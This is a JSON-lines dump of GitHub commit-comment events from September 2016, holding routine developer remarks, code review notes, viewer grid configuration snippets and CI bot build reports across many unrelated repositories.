{"id":"4552944651","type":"CommitCommentEvent","actor":{"login":"heitorcolangelo"},"repo":{"name":"SKART1/test-butler"},"payload":{"comment":{"id":18994818,"position":null,"line":null,"path":null,"commit_id":"6008e72462ae86ac71491ee2273990d36ec8ab8b","created_at":"2016-09-13T01:39:25Z","updated_at":"2016-09-13T01:39:25Z","body":"Hi!\r\nIs this revoke method working fine?\r\nI've tried here but got some errors.\r\nThanks!"}},"created_at":"2016-09-13T01:39:25Z"}
{"id":"4552948543","type":"CommitCommentEvent","actor":{"login":"jovo"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":18994823,"position":null,"line":null,"path":null,"commit_id":"c45b78dcaa35dce5c260be3b11d70f5a43c196ef","created_at":"2016-09-13T01:40:47Z","updated_at":"2016-09-13T01:40:47Z","body":"indeed they do.\nlet's see if we can fit splines to each group then?\n\nOn Mon, Sep 12, 2016 at 5:38 PM, Jesse Leigh Patsolic <\nnotifications@github.com> wrote:\n\n> @jovo <https://github.com/jovo> Here's the html file\n> <http://docs.neurodata.io/synaptome-stats/Code/mm20160912.html>.\n>\n> Everything looks good. 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/neurodata/synaptome-stats/commit/c45b78dcaa35dce5c260be3b11d70f5a43c196ef#commitcomment-18992126>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACjcle89rosRqVFrquvrVVKgrvtBl6Zks5qpcZZgaJpZM4J7DfD>\n> .\n>\n\n\n\n-- \nthe glass is all full:  half water, half air.\nneurodata.io, jovo calendar\n<https://calendar.google.com/calendar/embed?src=joshuav%40gmail.com&ctz=America/New_York>\n"}},"created_at":"2016-09-13T01:40:47Z"}
{"id":"4552948785","type":"CommitCommentEvent","actor":{"login":"muniv"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18994824,"position":null,"line":null,"path":null,"commit_id":"856379241eae3d12ed3dd534866bf2e5abb0eaaa","created_at":"2016-09-13T01:40:51Z","updated_at":"2016-09-13T01:40:51Z","body":"넵! "}},"created_at":"2016-09-13T01:40:51Z"}
{"id":"4552951420","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18994827,"position":24,"line":39,"path":"share/functions/__fish_config_interactive.fish","commit_id":"90e535f66f27e2ef39f8522840abb74db12d2f17","created_at":"2016-09-13T01:41:45Z","updated_at":"2016-09-13T01:41:45Z","body":"And yeah, we won't be doing this on release. Still worth doing as intended until then. \r\n\r\nI do want to force any settings using deprecated color-names to reset on release, however. I'm not sure it's necessary to be noisy/worry about backups. And we do pick some new defaults we really want to enforce (perhaps for the pager, if we can fix the bolding bug), we should just also quietly force those specific colors to reset. )"}},"created_at":"2016-09-13T01:41:45Z"}
{"id":"4552952214","type":"CommitCommentEvent","actor":{"login":"wy-fx-chen"},"repo":{"name":"wy-fx-chen/label"},"payload":{"comment":{"id":18994829,"position":null,"line":null,"path":null,"commit_id":"c9c7530a6a3700353d374ec6acea55940367d62d","created_at":"2016-09-13T01:42:04Z","updated_at":"2016-09-13T01:42:04Z","body":"他还isi萨特身体"}},"created_at":"2016-09-13T01:42:04Z"}
{"id":"4552955216","type":"CommitCommentEvent","actor":{"login":"LifeGold"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994836,"position":null,"line":null,"path":null,"commit_id":"c2c5e608365725ae6d8925fbfeb0ca7da625860a","created_at":"2016-09-13T01:43:06Z","updated_at":"2016-09-13T01:43:06Z","body":"Slightly corrected the data to be valid.\r\n\r\n<map>\r\n<key>auto_update</key>\r\n<boolean>0</boolean>\r\n<!--<key>SendGridInfoToViewerOnLogin</key><string>true</string> -->\r\n<key>gridname</key><string>RealLife3D</string>\r\n<key>gridnick</key><string>reallife3d</string>\r\n<key>helperuri</key><string>http://reallife3d.ru/faq/</string>\r\n<key>inventory_links</key><boolean>0</boolean>\r\n<key>loginpage</key><string></string>\r\n<key>loginuri</key><string>http://reallife3d.ru:8002/</string>\r\n<key>password</key><string>http://reallife3d.ru/restore/</string>\r\n<key>platform</key><string>Universe</string>\r\n<key>register</key><string>http://www.reallife3d.ru</string>\r\n<key>render_compat</key><boolean>1</boolean>\r\n<key>search</key><string />\r\n<key>support</key><string>http://reallife3d.ru/support/</string>\r\n<key>website</key><string>http://www.reallife3d.ru</string>\r\n</map>"}},"created_at":"2016-09-13T01:43:06Z"}
{"id":"4552955838","type":"CommitCommentEvent","actor":{"login":"vmorenomarin"},"repo":{"name":"albertvaka/kdeconnect-kde"},"payload":{"comment":{"id":18994839,"position":15,"line":60,"path":"plasmoid/package/contents/ui/DeviceDelegate.qml","commit_id":"932d8db6bc3ac2be7ba78f1c993039dcc364905b","created_at":"2016-09-13T01:43:17Z","updated_at":"2016-09-13T01:43:17Z","body":"In my desktop not appears this icon.  I changed `question` icon for `search` and it was possible see the icon."}},"created_at":"2016-09-13T01:43:17Z"}
{"id":"4552957235","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18994840,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-13T01:43:45Z","updated_at":"2016-09-13T01:43:45Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-13T01:43:45Z"}
{"id":"4552960903","type":"CommitCommentEvent","actor":{"login":"raidancampbell"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994853,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:45:07Z","updated_at":"2016-09-13T01:45:07Z","body":"I don't think I've ever been able to replicate this issue.  Here are the screenshots I see: [normal](https://www.dropbox.com/s/salmwx6lq1mmyny/Screenshot%202016-09-12%2021.44.29.png?dl=0), and [fullscreen](https://www.dropbox.com/s/m773fw1ne5ww91s/Screenshot%202016-09-12%2021.38.42.png?dl=0)"}},"created_at":"2016-09-13T01:45:07Z"}
{"id":"4552961645","type":"CommitCommentEvent","actor":{"login":"thigullaabhi"},"repo":{"name":"thigullaabhi/TestEngine"},"payload":{"comment":{"id":18994854,"position":5,"line":4,"path":"TestEngineData/LoginPageNew.aspx","commit_id":"f176290fedbca4a3c92ecfc6e5f17cdfd299afa6","created_at":"2016-09-13T01:45:22Z","updated_at":"2016-09-13T01:45:22Z","body":"Change is fien"}},"created_at":"2016-09-13T01:45:22Z"}
{"id":"4552961960","type":"CommitCommentEvent","actor":{"login":"aaronj1335"},"repo":{"name":"aaronj1335/textual-sulaco"},"payload":{"comment":{"id":18994855,"position":null,"line":null,"path":null,"commit_id":"46ce954a6ac1c6282d2b359cead8b90ad8089b64","created_at":"2016-09-13T01:45:30Z","updated_at":"2016-09-13T01:45:30Z","body":"no `localUserNickname`?? gah&hellip; i've got a work network with a different name. that'd really be useful. yea i've hacked this up so much with personal stuff i don't have anything to contribute back. i appreciate the heads up though. i'll try to remember to @-mention you if/when i get around to upgrading and fixing."}},"created_at":"2016-09-13T01:45:30Z"}
{"id":"4552962366","type":"CommitCommentEvent","actor":{"login":"thigullaabhi"},"repo":{"name":"thigullaabhi/TestEngine"},"payload":{"comment":{"id":18994856,"position":null,"line":null,"path":null,"commit_id":"f176290fedbca4a3c92ecfc6e5f17cdfd299afa6","created_at":"2016-09-13T01:45:41Z","updated_at":"2016-09-13T01:45:41Z","body":"The commit is fine"}},"created_at":"2016-09-13T01:45:41Z"}
{"id":"4552964206","type":"CommitCommentEvent","actor":{"login":"ShadowBullet"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994862,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:46:22Z","updated_at":"2016-09-13T01:46:22Z","body":"Issue is fixed with this commit"}},"created_at":"2016-09-13T01:46:22Z"}
{"id":"4552964584","type":"CommitCommentEvent","actor":{"login":"sfwn"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":18994863,"position":null,"line":null,"path":null,"commit_id":"bb76f24af2010943387ce696a7092175b4ecccf2","created_at":"2016-09-13T01:46:30Z","updated_at":"2016-09-13T01:46:30Z","body":"excited!"}},"created_at":"2016-09-13T01:46:30Z"}
{"id":"4552971212","type":"CommitCommentEvent","actor":{"login":"LifeGold"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994881,"position":null,"line":null,"path":null,"commit_id":"c2c5e608365725ae6d8925fbfeb0ca7da625860a","created_at":"2016-09-13T01:49:01Z","updated_at":"2016-09-13T01:49:01Z","body":"@emperorstarfinder \r\n`<key>helperuri</key><string>http://reallife3d.ru/faq/</string>\r\n<key>inventory_links</key><boolean>0</boolean>\r\n<key>loginpage</key><string></string>\r\n<key>loginuri</key><string>http://reallife3d.ru:8002/</string>\r\n<key>password</key><string>http://reallife3d.ru/restore/</string>\r\n<key>platform</key><string>Universe</string>\r\n<key>register</key><string>http://www.reallife3d.ru</string>\r\n<key>render_compat</key><boolean>1</boolean>\r\n<key>search</key><string />\r\n<key>support</key><string>http://reallife3d.ru/support/</string>\r\n<key>website</key><string>http://www.reallife3d.ru</string>`"}},"created_at":"2016-09-13T01:49:01Z"}
{"id":"4552975095","type":"CommitCommentEvent","actor":{"login":"NateDies"},"repo":{"name":"NateDies/NateDies.github.io"},"payload":{"comment":{"id":18994884,"position":null,"line":null,"path":null,"commit_id":"27ef2b680e2800da82621531814aefdf2c703d1c","created_at":"2016-09-13T01:50:23Z","updated_at":"2016-09-13T01:50:23Z","body":"Create vid folder"}},"created_at":"2016-09-13T01:50:23Z"}
{"id":"4552977278","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18994891,"position":null,"line":null,"path":null,"commit_id":"28b86783534312790d5c32043c521ca649e10746","created_at":"2016-09-13T01:51:12Z","updated_at":"2016-09-13T01:51:12Z","body":"Related to: backdrop/backdrop-issues#2167 "}},"created_at":"2016-09-13T01:51:12Z"}
{"id":"4552977298","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18994892,"position":null,"line":null,"path":null,"commit_id":"a94bab84a16c274be3769dc82153cb3462536519","created_at":"2016-09-13T01:51:13Z","updated_at":"2016-09-13T01:51:13Z","body":"Related to: backdrop/backdrop-issues#2167 "}},"created_at":"2016-09-13T01:51:13Z"}
{"id":"4552979708","type":"CommitCommentEvent","actor":{"login":"dinatale2"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994898,"position":14,"line":308,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T01:52:08Z","updated_at":"2016-09-13T01:52:08Z","body":"In bb-bootstrap.sh, if BB_MODE is \"TEST\", kernels are updated. My guess is that the same thing will have to happen for BB_MODE of \"PERF\"?"}},"created_at":"2016-09-13T01:52:08Z"}
{"id":"4552980691","type":"CommitCommentEvent","actor":{"login":"trunglen"},"repo":{"name":"trunglen/Hello-World"},"payload":{"comment":{"id":18994902,"position":null,"line":null,"path":null,"commit_id":"19f60e285a123fbb4eb2bb21c06fe147fd25f793","created_at":"2016-09-13T01:52:28Z","updated_at":"2016-09-13T01:52:28Z","body":"init"}},"created_at":"2016-09-13T01:52:28Z"}
{"id":"4552982292","type":"CommitCommentEvent","actor":{"login":"emperorstarfinder"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994909,"position":null,"line":null,"path":null,"commit_id":"c2c5e608365725ae6d8925fbfeb0ca7da625860a","created_at":"2016-09-13T01:53:05Z","updated_at":"2016-09-13T01:53:05Z","body":"<key>helperuri</key><string>http://reallife3d.ru/faq/</string>\r\n\r\nis for the economy helper for the viewer.  This is why its set to <key>helperuri</key><string>http://reallife3d.ruL8009/</string>"}},"created_at":"2016-09-13T01:53:05Z"}
{"id":"4552982510","type":"CommitCommentEvent","actor":{"login":"cmura81"},"repo":{"name":"cmura81/Shatter"},"payload":{"comment":{"id":18994911,"position":null,"line":null,"path":null,"commit_id":"29a402effbb0c987203f1c2dc644441822b31d54","created_at":"2016-09-13T01:53:10Z","updated_at":"2016-09-13T01:53:10Z","body":"Refactored `repo/include/shatter` to `repo/include`.\r\nMoved `repo/include/config-defs.h` to `repo/config-defs.h`.\r\n\r\nDocumented bakefile, added multiple include dir support.\r\n\r\nMass find and replace:\r\n\r\n```\r\n:%s/\\#\\s*include\\s*\\<shatter\\/(.*)\\>/\\#include\\ \\<\\1\\>/g\r\n```"}},"created_at":"2016-09-13T01:53:10Z"}
{"id":"4552986649","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18994921,"position":null,"line":null,"path":null,"commit_id":"e9cdf48f3c4b4abddf73fbd53217dbfd3b750c5f","created_at":"2016-09-13T01:54:40Z","updated_at":"2016-09-13T01:54:40Z","body":"Related to: backdrop/backdrop-issues#2166 "}},"created_at":"2016-09-13T01:54:40Z"}
{"id":"4552990004","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18994925,"position":null,"line":null,"path":null,"commit_id":"8533515a4bfc55e254513aa1f421a4e8c4f4230d","created_at":"2016-09-13T01:55:52Z","updated_at":"2016-09-13T01:55:52Z","body":"Related to: backdrop/backdrop-issues#2166 "}},"created_at":"2016-09-13T01:55:52Z"}
{"id":"4552990514","type":"CommitCommentEvent","actor":{"login":"dead"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994926,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:56:06Z","updated_at":"2016-09-13T01:56:06Z","body":"The problem this commit fix can be replicate reducing the app width.\r\nBut this introduce a \"problem\" as you can see in your image https://www.dropbox.com/s/salmwx6lq1mmyny/Screenshot%202016-09-12%2021.44.29.png?dl=0, the \"No Box Art\" in l4d is bigger than the other box art. (this is not a real problem unless a box art is bigger than the mdl container)"}},"created_at":"2016-09-13T01:56:06Z"}
{"id":"4552992124","type":"CommitCommentEvent","actor":{"login":"Jmquinteroo"},"repo":{"name":"JPS1217/POO-2016-2"},"payload":{"comment":{"id":18994934,"position":null,"line":null,"path":null,"commit_id":"07451d367031905380e605039f3e4114d9d7f692","created_at":"2016-09-13T01:56:40Z","updated_at":"2016-09-13T01:56:40Z","body":"sad"}},"created_at":"2016-09-13T01:56:40Z"}
{"id":"4552996861","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":18994942,"position":null,"line":null,"path":null,"commit_id":"33b8fba461618bc8ba3ad20026fbbdc4df7f601c","created_at":"2016-09-13T01:58:29Z","updated_at":"2016-09-13T01:58:29Z","body":"Fixed, thank you"}},"created_at":"2016-09-13T01:58:29Z"}
{"id":"4552997288","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18994944,"position":null,"line":null,"path":null,"commit_id":"556f62cd02e5b0217edfec18cd241a6050fa0313","created_at":"2016-09-13T01:58:38Z","updated_at":"2016-09-13T01:58:38Z","body":"Related to: backdrop/backdrop-issues#2165 "}},"created_at":"2016-09-13T01:58:38Z"}
{"id":"4552998589","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18994953,"position":null,"line":null,"path":null,"commit_id":"250df8f6857fbab72b52dd72c041957e310433f7","created_at":"2016-09-13T01:59:07Z","updated_at":"2016-09-13T01:59:07Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2300 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T01:59:07Z"}
{"id":"4552999085","type":"CommitCommentEvent","actor":{"login":"antonym"},"repo":{"name":"antonym/xs_patcher"},"payload":{"comment":{"id":18994954,"position":null,"line":null,"path":null,"commit_id":"493b365295a1e76a51184b6d87c8fd71cfd7febb","created_at":"2016-09-13T01:59:17Z","updated_at":"2016-09-13T01:59:17Z","body":"Thanks!"}},"created_at":"2016-09-13T01:59:17Z"}
{"id":"4552999223","type":"CommitCommentEvent","actor":{"login":"jjweis"},"repo":{"name":"playameco/playameco.github.io"},"payload":{"comment":{"id":18994955,"position":22,"line":17,"path":"README.md","commit_id":"6951e8a43a32d2c549730a2d81ba765ad0063de4","created_at":"2016-09-13T01:59:20Z","updated_at":"2016-09-13T01:59:20Z","body":"Nice to have: connect in to OpenStreetMap to get that info into the open data ecosystem."}},"created_at":"2016-09-13T01:59:20Z"}
{"id":"4552999421","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":18994956,"position":null,"line":null,"path":null,"commit_id":"6025a03610bb25eaff03d70d8e2519cba48d6b92","created_at":"2016-09-13T01:59:23Z","updated_at":"2016-09-13T01:59:23Z","body":"![home](https://cloud.githubusercontent.com/assets/6500800/18458994/e8783d40-791a-11e6-9310-d5741332554e.JPG)\r\n![viewtype_list-1](https://cloud.githubusercontent.com/assets/6500800/18459000/eec07942-791a-11e6-96a3-4d251f91860b.JPG)\r\n![viewtype_list-2](https://cloud.githubusercontent.com/assets/6500800/18459001/f18557e2-791a-11e6-9e2a-4a597a6252fa.JPG)\r\n![videoosd](https://cloud.githubusercontent.com/assets/6500800/18459005/f59d2aa8-791a-11e6-89bc-df6846075227.JPG)\r\n![dialogsavestates](https://cloud.githubusercontent.com/assets/6500800/18459008/fab69bfa-791a-11e6-9544-28f00fc107ce.JPG)\r\n![settings](https://cloud.githubusercontent.com/assets/6500800/18459009/fe1d7a0c-791a-11e6-9102-ccc7d3911764.JPG)\r\n![dialoggamecontrollers](https://cloud.githubusercontent.com/assets/6500800/18459012/019f1032-791b-11e6-9c58-af218432e9db.JPG)\r\n"}},"created_at":"2016-09-13T01:59:23Z"}
{"id":"4554604815","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18998971,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-13T10:00:18Z","updated_at":"2016-09-13T10:00:18Z","body":"Did you try a clean rebuild?\n\nOn 13/09/16 11:58, Alvaro Huarte wrote:\n>\n> Hi @m-kuhn <https://github.com/m-kuhn>, I can't build QGIS in vs2010\n> and vs2015 from this commit. I get these unresolve external symbols.\n>\n> image\n> <https://cloud.githubusercontent.com/assets/5576272/18469487/aa248538-79a8-11e6-8690-d7ef1d4174fe.png>\n>\n> What can I do to resolve it? I should create a new bug entry in the\n> issues repo?\n> Thanks in advance\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/qgis/QGIS/commit/8cf0ef93c454a02362377e5bce2d8c8c8b6015a4#commitcomment-18998953>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAj6d4rom0XP1eNl27PExf_mRoYAw6yhks5qpnPfgaJpZM4J7fm4>.\n>\n\n"}},"created_at":"2016-09-13T10:00:18Z"}
{"id":"4554606231","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18998975,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-13T10:00:32Z","updated_at":"2016-09-13T10:00:32Z","body":"![Szeptember 13. - Kedd](http://ujlipot.vakvarju.com/data/napimenu/21.jpg?v=1473664767)\nHúsleves daragaluskával gazdagon\r\nBolognai húsos lasagne\r\nMeggyes pite"}},"created_at":"2016-09-13T10:00:32Z"}
{"id":"4554606653","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18998976,"position":5,"line":61,"path":"libkrun/libkruntime.c","commit_id":"bf0380ea5b0d238d0d1579ba96bf30c7785c96b7","created_at":"2016-09-13T10:00:37Z","updated_at":"2016-09-13T10:00:37Z","body":"Almost certainly should be:\r\n```c\r\n#elif (defined(__linux__) && defined(TRAVIS)) || defined(__OpenBSD__)\r\n```\r\nto make sure the priorities are correct (or, at least, clear to the reader)."}},"created_at":"2016-09-13T10:00:37Z"}
{"id":"4554607813","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18998978,"position":null,"line":null,"path":null,"commit_id":"5eb0c39a3e10753d600bed5a8541490820fbbb59","created_at":"2016-09-13T10:00:51Z","updated_at":"2016-09-13T10:00:51Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:00:51Z"}
{"id":"4554609258","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18998984,"position":null,"line":null,"path":null,"commit_id":"e1e2af8b0694d5a8a216674246fbc29111be2bfd","created_at":"2016-09-13T10:01:09Z","updated_at":"2016-09-13T10:01:09Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 253](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1209&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-13T10:01:09Z"}
{"id":"4554610767","type":"CommitCommentEvent","actor":{"login":"flosell"},"repo":{"name":"flosell/lambdacd"},"payload":{"comment":{"id":18998992,"position":null,"line":null,"path":null,"commit_id":"8b10dc28b1081944caeb7dc96f7c8e2b7575e0bb","created_at":"2016-09-13T10:01:27Z","updated_at":"2016-09-13T10:01:27Z","body":"You are right, thanks for catching this! I've opened #133 and I'll fix this asap. "}},"created_at":"2016-09-13T10:01:27Z"}
{"id":"4554611193","type":"CommitCommentEvent","actor":{"login":"foghina"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18998993,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T10:01:30Z","updated_at":"2016-09-13T10:01:30Z","body":"It is a breaking change if you were using `ActivityEventListener` directly, instead of `BaseActivityEventListener`. Sorry, but there was no other way. Consider using the base class in the future to avoid compilation errors as we might change the interface in the future."}},"created_at":"2016-09-13T10:01:30Z"}
{"id":"4554614116","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18999001,"position":null,"line":null,"path":null,"commit_id":"e1e2af8b0694d5a8a216674246fbc29111be2bfd","created_at":"2016-09-13T10:02:06Z","updated_at":"2016-09-13T10:02:06Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 253](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1209&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:57"}},"created_at":"2016-09-13T10:02:06Z"}
{"id":"4554617601","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999013,"position":6,"line":7,"path":"server/persistence/bookPersistence.js","commit_id":"dfd3793e578c50a5be86bbb2f3db85ff71a2ea0d","created_at":"2016-09-13T10:02:47Z","updated_at":"2016-09-13T10:02:47Z","body":"author - not outhor"}},"created_at":"2016-09-13T10:02:47Z"}
{"id":"4554618796","type":"CommitCommentEvent","actor":{"login":"quole"},"repo":{"name":"tmteam/Word2vec.Tools"},"payload":{"comment":{"id":18999015,"position":null,"line":null,"path":null,"commit_id":"9facacc9880498a3618cc989c7c1c2387ec26db4","created_at":"2016-09-13T10:03:02Z","updated_at":"2016-09-13T10:03:02Z","body":"I couldn't open headerless plaintext files such as `glove.840B.300d.txt` ([source](http://nlp.stanford.edu/projects/glove/)), and now I can.\r\n\r\nI haven't tested it with any files which _do_ have a header as I haven't come across any of these or generated any as yet, but they should still work the same. Sorry the code gets a little verbose (though it would be longer still with more checks)"}},"created_at":"2016-09-13T10:03:02Z"}
{"id":"4554621925","type":"CommitCommentEvent","actor":{"login":"sathishmurugesh"},"repo":{"name":"sathishmurugesh/WBDocs"},"payload":{"comment":{"id":18999024,"position":null,"line":null,"path":null,"commit_id":"191e3a8bc6b9eb37affd84b980becd5f6c9dbf81","created_at":"2016-09-13T10:03:40Z","updated_at":"2016-09-13T10:03:40Z","body":"test"}},"created_at":"2016-09-13T10:03:40Z"}
{"id":"4554622008","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999025,"position":null,"line":null,"path":null,"commit_id":"f6595bd1d13d7007089b21f5e704aa16375c1382","created_at":"2016-09-13T10:03:41Z","updated_at":"2016-09-13T10:03:41Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:03:41Z"}
{"id":"4554622009","type":"CommitCommentEvent","actor":{"login":"sbrunner"},"repo":{"name":"camptocamp/demo_geomapfish"},"payload":{"comment":{"id":18999026,"position":14,"line":162,"path":"demo/templates/mobile.html","commit_id":"85a59ec5cbbbd9c2edf166db7ab9c484f2f50d92","created_at":"2016-09-13T10:03:41Z","updated_at":"2016-09-13T10:03:41Z","body":"I miss understand because we don't have a `| n` in the mako :-)"}},"created_at":"2016-09-13T10:03:41Z"}
{"id":"4554625164","type":"CommitCommentEvent","actor":{"login":"fredj"},"repo":{"name":"camptocamp/demo_geomapfish"},"payload":{"comment":{"id":18999034,"position":14,"line":162,"path":"demo/templates/mobile.html","commit_id":"85a59ec5cbbbd9c2edf166db7ab9c484f2f50d92","created_at":"2016-09-13T10:04:22Z","updated_at":"2016-09-13T10:04:22Z","body":"and FYI, the `type` attribute is optional in html5: https://www.w3.org/TR/html5/scripting-1.html#attr-script-type"}},"created_at":"2016-09-13T10:04:22Z"}
{"id":"4554630822","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999057,"position":42,"line":42,"path":"server/persistence/bookPersistence.js","commit_id":"dfd3793e578c50a5be86bbb2f3db85ff71a2ea0d","created_at":"2016-09-13T10:05:26Z","updated_at":"2016-09-13T10:05:26Z","body":"use `join` function"}},"created_at":"2016-09-13T10:05:26Z"}
